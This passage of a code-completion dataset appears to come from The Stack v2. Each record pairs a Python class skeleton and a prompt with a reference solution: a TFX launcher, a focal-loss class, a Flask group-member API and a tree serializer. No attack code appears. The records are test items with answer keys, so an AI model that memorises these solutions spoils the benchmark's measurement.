executor_spec.ExecutorClassSpec)\n<|end_body_0|>\n\n<|body_start_1|>\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n<|end_body_1|>\n", "class_docstring": "Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.", "class_name": "InProcessComponentLauncher", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n <|body_0|>\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if component_config:\n return False\n return isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)\n<|end_body_0|>\n\n<|body_start_1|>\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000076", "length_bytes": 3187, "license_type": "permissive", "methods": [{"docstring": "Checks if the launcher can launch the executor spec.", "name": "can_launch", "signature": "def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool"}, {"docstring": "Execute underlying component implementation.", "name": "_run_executor", "signature": "def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `InProcessComponentLauncher` described below.\n\nClass description:\nResponsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\n\nMethod signatures and docstrings:\n- def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool: Checks if the launcher can launch the executor spec.\n- def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None: Execute underlying component implementation.", "prompted_full_text": "Implement the Python class `InProcessComponentLauncher` described below.\n\nClass description:\nResponsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\n\nMethod signatures and docstrings:\n- def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool: Checks if the launcher can launch the executor spec.\n- def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None: Execute underlying component implementation.\n\n<|skeleton|>\nclass InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n <|body_0|>\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if component_config:\n return False\n return isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)\n<|end_body_0|>\n\n<|body_start_1|>\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n<|end_body_1|>\n", "revision_id": "1b328504fa08a70388691e4072df76f143631325", "skeleton": "<|skeleton|>\nclass InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n <|body_0|>\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InProcessComponentLauncher:\n \"\"\"Responsible for launching a python executor. The executor will be launched in the same process of the rest of the component, i.e. its driver and publisher.\"\"\"\n\n def can_launch(cls, component_executor_spec: executor_spec.ExecutorSpec, component_config: base_component_config.BaseComponentConfig) -> bool:\n \"\"\"Checks if the launcher can launch the executor spec.\"\"\"\n if component_config:\n return False\n return isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)\n\n def _run_executor(self, execution_id: int, input_dict: Dict[str, List[types.Artifact]], output_dict: Dict[str, List[types.Artifact]], exec_properties: Dict[str, Any]) -> None:\n \"\"\"Execute underlying component implementation.\"\"\"\n executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\n if issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n else:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\n executor = executor_class_spec.executor_class(executor_context)\n executor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))\n", "source": "the_stack_v2_python_sparse", "source_path": "tfx/orchestration/launcher/in_process_component_launcher.py", "source_repo": "tensorflow/tfx", "split": "test", "star_events_count": 2116} {"blob_id": "0341adbcc9667e041ccd24776d3d8b1a0d8eb714", "bodies": ["super().__init__(**kwargs)\nself.alpha = alpha\nself.gamma = gamma\nself.label_smoothing = label_smoothing", "normalizer, y_true = y\nalpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\ngamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\npred_prob = tf.sigmoid(y_pred)\np_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\nalpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\nmodulating_factor = (1.0 - p_t) ** gamma\ny_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\nce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\nreturn alpha_factor * modulating_factor * ce / normalizer"], "bodies_text": "<|body_start_0|>\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n<|end_body_0|>\n\n<|body_start_1|>\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n<|end_body_1|>\n", "class_docstring": "Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.", "class_name": "FocalLoss", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n <|body_0|>\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n<|end_body_0|>\n\n<|body_start_1|>\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000077", "length_bytes": 17443, "license_type": "permissive", "methods": [{"docstring": "Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.", "name": "__init__", "signature": "def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs)"}, {"docstring": "Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.", "name": "call", "signature": "def call(self, y, y_pred)"}], "n_methods": 2, "prompt": "Implement the Python class `FocalLoss` described below.\n\nClass description:\nCompute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\n\nMethod signatures and docstrings:\n- def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs): Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\n- def call(self, y, y_pred): Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.", "prompted_full_text": "Implement the Python class `FocalLoss` described below.\n\nClass description:\nCompute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\n\nMethod signatures and docstrings:\n- def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs): Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\n- def call(self, y, y_pred): Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\n\n<|skeleton|>\nclass FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n <|body_0|>\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n<|end_body_0|>\n\n<|body_start_1|>\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n<|end_body_1|>\n", "revision_id": "a5388a45f71a949639b35cc5b990bd130d2d8164", "skeleton": "<|skeleton|>\nclass FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n <|body_0|>\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FocalLoss:\n \"\"\"Compute the focal loss between `logits` and the golden `target` values. Focal loss = -(1-pt)^gamma * log(pt) where pt is the probability of being classified to the true class.\"\"\"\n\n def __init__(self, alpha, gamma, label_smoothing=0.0, **kwargs):\n \"\"\"Initialize focal loss. Args: alpha: A float32 scalar multiplying alpha to the loss from positive examples and (1-alpha) to the loss from negative examples. gamma: A float32 scalar modulating loss from hard and easy examples. label_smoothing: Float in [0, 1]. If > `0` then smooth the labels. **kwargs: other params.\"\"\"\n super().__init__(**kwargs)\n self.alpha = alpha\n self.gamma = gamma\n self.label_smoothing = label_smoothing\n\n def call(self, y, y_pred):\n \"\"\"Compute focal loss for y and y_pred. Args: y: A tuple of (normalizer, y_true), where y_true is the target class. y_pred: A float32 tensor [batch, height_in, width_in, num_predictions]. Returns: the focal loss.\"\"\"\n normalizer, y_true = y\n alpha = tf.convert_to_tensor(self.alpha, dtype=y_pred.dtype)\n gamma = tf.convert_to_tensor(self.gamma, dtype=y_pred.dtype)\n pred_prob = tf.sigmoid(y_pred)\n p_t = y_true * pred_prob + (1 - y_true) * (1 - pred_prob)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n modulating_factor = (1.0 - p_t) ** gamma\n y_true = y_true * (1.0 - self.label_smoothing) + 0.5 * self.label_smoothing\n ce = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n return alpha_factor * modulating_factor * ce / normalizer\n", "source": "the_stack_v2_python_sparse", "source_path": "TensorFlow2/Detection/Efficientdet/utils/train_lib.py", "source_repo": "NVIDIA/DeepLearningExamples", "split": "test", "star_events_count": 11838} {"blob_id": "a8904f2c319ee5ca143ec31fb7a53c891df28290", "bodies": ["result = {'result': 'NG'}\nctrl_obj = CtrlGroup()\ncontent = ctrl_obj.get_group_members(group_id)\nif content:\n result['result'] = 'OK'\n result['content'] = content\nreturn result", "json_data = request.get_json(force=True)\nctrl_obj = CtrlGroup()\nresult = {'result': 'NG', 'error': ''}\ntry:\n ctrl_obj.add_group_members(json_data)\n result['result'] = 'OK'\nexcept Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\nreturn result", "json_data = request.get_json(force=True)\nctrl_obj = CtrlGroup()\nresult = {'result': 'NG', 'error': ''}\ntry:\n ctrl_obj.update_member_role(json_data)\n result['result'] = 'OK'\nexcept Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\nreturn result", "ctrl_obj = CtrlGroup()\nresult = {'result': 'NG', 'error': ''}\ntry:\n ctrl_obj.delete_member(group_id, user_id)\n result['result'] = 'OK'\nexcept Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\nreturn result"], "bodies_text": "<|body_start_0|>\n result = {'result': 'NG'}\n ctrl_obj = CtrlGroup()\n content = ctrl_obj.get_group_members(group_id)\n if content:\n result['result'] = 'OK'\n result['content'] = content\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.add_group_members(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.update_member_role(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.delete_member(group_id, user_id)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_3|>\n", "class_docstring": "", "class_name": "ApiGroupMembers", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ApiGroupMembers:\n\n def get(self, group_id=None):\n \"\"\"获取组成员信息 :param group_id: :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"添加组成员 :return:\"\"\"\n <|body_1|>\n\n def put(self):\n \"\"\"编辑组成员角色 :return:\"\"\"\n <|body_2|>\n\n def delete(self, group_id, user_id):\n \"\"\"删除组成员 :param group_id: :param user_id: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n result = {'result': 'NG'}\n ctrl_obj = CtrlGroup()\n content = ctrl_obj.get_group_members(group_id)\n if content:\n result['result'] = 'OK'\n result['content'] = content\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.add_group_members(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.update_member_role(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.delete_member(group_id, user_id)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000078", "length_bytes": 5041, "license_type": "no_license", "methods": [{"docstring": "获取组成员信息 :param group_id: :return:", "name": "get", "signature": "def get(self, group_id=None)"}, {"docstring": "添加组成员 :return:", "name": "post", "signature": "def post(self)"}, {"docstring": "编辑组成员角色 :return:", "name": "put", "signature": "def put(self)"}, {"docstring": "删除组成员 :param group_id: :param user_id: :return:", "name": "delete", "signature": "def delete(self, group_id, user_id)"}], "n_methods": 4, "prompt": "Implement the Python class `ApiGroupMembers` described below.\n\nClass description:\nImplement the ApiGroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, group_id=None): 获取组成员信息 :param group_id: :return:\n- def post(self): 添加组成员 :return:\n- def put(self): 编辑组成员角色 :return:\n- def delete(self, group_id, user_id): 删除组成员 :param group_id: :param user_id: :return:", "prompted_full_text": "Implement the Python class `ApiGroupMembers` described below.\n\nClass description:\nImplement the ApiGroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, group_id=None): 获取组成员信息 :param group_id: :return:\n- def post(self): 添加组成员 :return:\n- def put(self): 编辑组成员角色 :return:\n- def delete(self, group_id, user_id): 删除组成员 :param group_id: :param user_id: :return:\n\n<|skeleton|>\nclass ApiGroupMembers:\n\n def get(self, group_id=None):\n \"\"\"获取组成员信息 :param group_id: :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"添加组成员 :return:\"\"\"\n <|body_1|>\n\n def put(self):\n \"\"\"编辑组成员角色 :return:\"\"\"\n <|body_2|>\n\n def delete(self, group_id, user_id):\n \"\"\"删除组成员 :param group_id: :param user_id: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n result = {'result': 'NG'}\n ctrl_obj = CtrlGroup()\n content = ctrl_obj.get_group_members(group_id)\n if content:\n result['result'] = 'OK'\n result['content'] = content\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.add_group_members(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.update_member_role(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_2|>\n\n<|body_start_3|>\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.delete_member(group_id, user_id)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n<|end_body_3|>\n", "revision_id": "64b31e7bdfcb8a4c95f0a8a607f0bcff576cec11", "skeleton": "<|skeleton|>\nclass ApiGroupMembers:\n\n def get(self, group_id=None):\n \"\"\"获取组成员信息 :param group_id: :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"添加组成员 :return:\"\"\"\n <|body_1|>\n\n def put(self):\n \"\"\"编辑组成员角色 :return:\"\"\"\n <|body_2|>\n\n def delete(self, group_id, user_id):\n \"\"\"删除组成员 :param group_id: :param user_id: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ApiGroupMembers:\n def get(self, group_id=None):\n \"\"\"获取组成员信息 :param group_id: :return:\"\"\"\n result = {'result': 'NG'}\n ctrl_obj = CtrlGroup()\n content = ctrl_obj.get_group_members(group_id)\n if content:\n result['result'] = 'OK'\n result['content'] = content\n return result\n\n def post(self):\n \"\"\"添加组成员 :return:\"\"\"\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.add_group_members(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n\n def put(self):\n \"\"\"编辑组成员角色 :return:\"\"\"\n json_data = request.get_json(force=True)\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.update_member_role(json_data)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n\n def delete(self, group_id, user_id):\n \"\"\"删除组成员 :param group_id: :param user_id: :return:\"\"\"\n ctrl_obj = CtrlGroup()\n result = {'result': 'NG', 'error': ''}\n try:\n ctrl_obj.delete_member(group_id, user_id)\n result['result'] = 'OK'\n except Exception as e:\n current_app.logger.error('%s' % str(e))\n result['error'] = str(e)\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "Source/collaboration_2/app/api_1_0/api_group_members.py", "source_repo": "lsn1183/web_project", "split": "test", "star_events_count": 0} {"blob_id": "397712fb8f2369fc535f77090b6f6264002cb1f0", "bodies": ["def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\ndef preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\ns1 = s2 = root\nreturn inorderSerialize(s1) + '/' + preorderSerialize(s2)", "def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\ninorder, preorder = tuple(data.split('/'))\nreturn constructTree([int(s) for s in inorder], [int(s) for s in preorder])"], "bodies_text": "<|body_start_0|>\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n<|end_body_0|>\n\n<|body_start_1|>\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n<|end_body_0|>\n\n<|body_start_1|>\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000079", "length_bytes": 2710, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single 